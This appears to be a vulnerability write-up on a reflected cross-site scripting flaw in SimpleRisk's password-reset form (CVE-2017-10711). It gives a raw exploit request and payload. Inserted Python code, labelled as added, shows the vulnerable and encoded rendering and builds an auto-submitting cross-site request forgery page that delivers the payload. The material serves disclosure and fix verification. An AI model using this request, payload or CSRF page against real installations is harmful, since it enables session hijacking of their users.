Hi Guys,
Today we will discuss a basic hunt for a reflected cross-site scripting vulnerability in the SimpleRisk platform, but first let's cover some general details about the platform itself.
What is SimpleRisk?
SimpleRisk is an open-source risk management system released under the Mozilla Public License. It enables risk managers to record risks, plan mitigation measures, facilitate management reviews, prioritize for project planning, and track periodic reviews. SimpleRisk allows risk managers to prioritize enterprise responses according to the severity of the threats and vulnerabilities that could impact the business.
SimpleRisk provides a dashboard for submitting a new risk for consideration by your team and for creating risk reports and graphs of risk levels and locations. It is highly configurable: report generation is dynamic, and risk formulas can be tweaked on the fly.
Now let’s dive into the technical details:
The “user” field in SimpleRisk’s password reset form is not properly sanitized or output-encoded, so dangerous user input is reflected into the page and executes JavaScript in the context of the application. An attacker who gets a SimpleRisk user to submit the crafted request can hijack that user's session cookies and perform actions on their behalf.
In the heart of the reset.php file:
As you can see in this commit, the value of the “user” input is echoed directly into the view without being filtered or encoded.
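The pattern described above, as an added Python illustration that is not SimpleRisk's own reset.php code: a hypothetical reset form that reflects the user value unencoded, the same form with attribute-context encoding (the PHP equivalent being htmlspecialchars with ENT_QUOTES), and a small parser-based check showing that the payload only becomes markup in the first case. The form markup, the function names and the payload constant are assumptions made for this example.

```python
import html
from html.parser import HTMLParser

# Constructed payload with the same shape as the one used in this write-up: it
# closes the surrounding attribute/comment/style/script context and then opens
# its own <script> element.
PAYLOAD = "'\"--></style></script><script>alert(document.domain)</script>"


def render_reset_form_vulnerable(user: str) -> str:
    """Hypothetical reflection of the 'user' field with no output encoding.

    This mirrors the bug described above (the input echoed straight into the
    view); it is an illustration, not SimpleRisk's reset.php.
    """
    return (
        '<form method="post" action="reset.php">'
        f'<input type="text" name="user" value="{user}">'
        '<input type="submit" name="password_reset" value="Reset">'
        '</form>'
    )


def render_reset_form_fixed(user: str) -> str:
    """Same form, with the value entity-encoded for the attribute context.

    quote=True also encodes ' and ", so the payload cannot close the value
    attribute. The PHP equivalent is htmlspecialchars($user, ENT_QUOTES).
    """
    return (
        '<form method="post" action="reset.php">'
        f'<input type="text" name="user" value="{html.escape(user, quote=True)}">'
        '<input type="submit" name="password_reset" value="Reset">'
        '</form>'
    )


class _ReflectionInspector(HTMLParser):
    """Tokenizes the rendered page roughly the way a browser would."""

    def __init__(self) -> None:
        super().__init__()
        self.script_tags = 0      # <script> start tags seen anywhere in the page
        self.user_value = None    # decoded value attribute of the input named 'user'

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1
        elif tag == "input" and dict(attrs).get("name") == "user":
            self.user_value = dict(attrs).get("value")


def inspect(rendered: str):
    """Return (number of <script> tags, decoded 'user' value) for a rendered page.

    The legitimate form contains no <script> at all, so a count above zero
    means the reflected value broke out of the attribute and became markup.
    In the vulnerable case the browser sees value="'" followed by a junk
    attribute "--" and then a real <script> element.
    """
    parser = _ReflectionInspector()
    parser.feed(rendered)
    parser.close()
    return parser.script_tags, parser.user_value


if __name__ == "__main__":
    for label, render in (("vulnerable", render_reset_form_vulnerable),
                          ("fixed", render_reset_form_fixed)):
        tags, value = inspect(render(PAYLOAD))
        print(f"{label:10s} script tags: {tags}  user value: {value!r}")
```

Entity-encoding for the attribute context is the fix; the parser check is only there to make the difference visible without a browser.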
Vulnerability Type:
Reflected Cross Site Scripting
More info:
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
Vulnerability Exploitation:
Through POST-based CSRF: the reflection happens on a POST request, so the attacker needs the victim to submit a crafted form (for example an auto-submitting one on an attacker-controlled page) that posts the payload to reset.php.
Version affected:
=> 20170614-001
Vulnerable Request:
POST /simplerisk/reset.php HTTP/1.1
Host: IP
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip, deflate
Content-Length: 128
Content-Type: application/x-www-form-urlencoded
user='"--></style></script><script>alert(document.domain)</script>&token=&password=&repeat_password=&password_reset=
Vulnerable Parameter:
user
Payload used:
'"--></style></script><script>alert(document.domain)</script>
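The delivery and verification described in this write-up, as an added Python example that is not part of the original post: the auto-submitting form an attacker would host to carry out the POST-based CSRF, the URL-encoded body the victim's browser then sends (the write-up shows it decoded), and a check that classifies a response as reflecting the payload raw, entity-encoded, or not at all. The target URL, the constructed responses and the function names are assumptions for the example.

```python
import html
from urllib.parse import urlencode

# Constructed lab values: the host is a documentation address, not a real
# SimpleRisk deployment, and the payload matches the one in this write-up.
TARGET = "http://192.0.2.10/simplerisk/reset.php"
PAYLOAD = "'\"--></style></script><script>alert(document.domain)</script>"
FIELDS = {
    "user": PAYLOAD,
    "token": "",
    "password": "",
    "repeat_password": "",
    "password_reset": "",
}


def request_body(fields: dict) -> str:
    """URL-encoded body the victim's browser sends for the crafted form."""
    return urlencode(fields)


def _esc(text: str) -> str:
    return html.escape(text, quote=True)


def build_csrf_page(action: str, fields: dict) -> str:
    """Attacker-hosted HTML page that auto-submits a POST to the target.

    Every name and value is entity-encoded so this page itself stays
    well-formed; the browser decodes the attributes when it builds the
    request, so the raw payload reaches reset.php and is reflected there,
    not on the attacker's page.
    """
    inputs = "".join(
        f'<input type="hidden" name="{_esc(name)}" value="{_esc(value)}">'
        for name, value in fields.items()
    )
    return (
        "<!doctype html><html><body>"
        f'<form id="csrf" method="post" action="{_esc(action)}">{inputs}</form>'
        '<script>document.getElementById("csrf").submit();</script>'
        "</body></html>"
    )


def reflection_status(response_body: str, payload: str) -> str:
    """Classify how the payload came back: 'raw', 'encoded' or 'absent'.

    'raw' is the exploitable case. 'encoded' covers any entity encoding
    (PHP's htmlspecialchars emits &#039; for a single quote, Python's
    html.escape emits &#x27;), which is why the second comparison is done
    after unescaping the response.
    """
    if payload in response_body:
        return "raw"
    if payload in html.unescape(response_body):
        return "encoded"
    return "absent"


def php_htmlspecialchars(text: str) -> str:
    """Approximation of PHP htmlspecialchars($text, ENT_QUOTES), used only to
    build the patched fixture below."""
    return (text.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")
                .replace('"', "&quot;").replace("'", "&#039;"))


# Constructed responses standing in for a vulnerable and a patched reset.php.
VULNERABLE_RESPONSE = f'<input type="text" name="user" value="{PAYLOAD}">'
PATCHED_RESPONSE = f'<input type="text" name="user" value="{php_htmlspecialchars(PAYLOAD)}">'

if __name__ == "__main__":
    print(request_body(FIELDS))
    print(build_csrf_page(TARGET, FIELDS))
    print("vulnerable:", reflection_status(VULNERABLE_RESPONSE, PAYLOAD))
    print("patched:   ", reflection_status(PATCHED_RESPONSE, PAYLOAD))
```

When confirming a fix, look for the "encoded" result rather than merely the absence of an alert: the value may still be reflected, which is fine as long as it can no longer close the attribute it lands in.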
Proof of concept Video:
Advisory:
CVE-2017-10711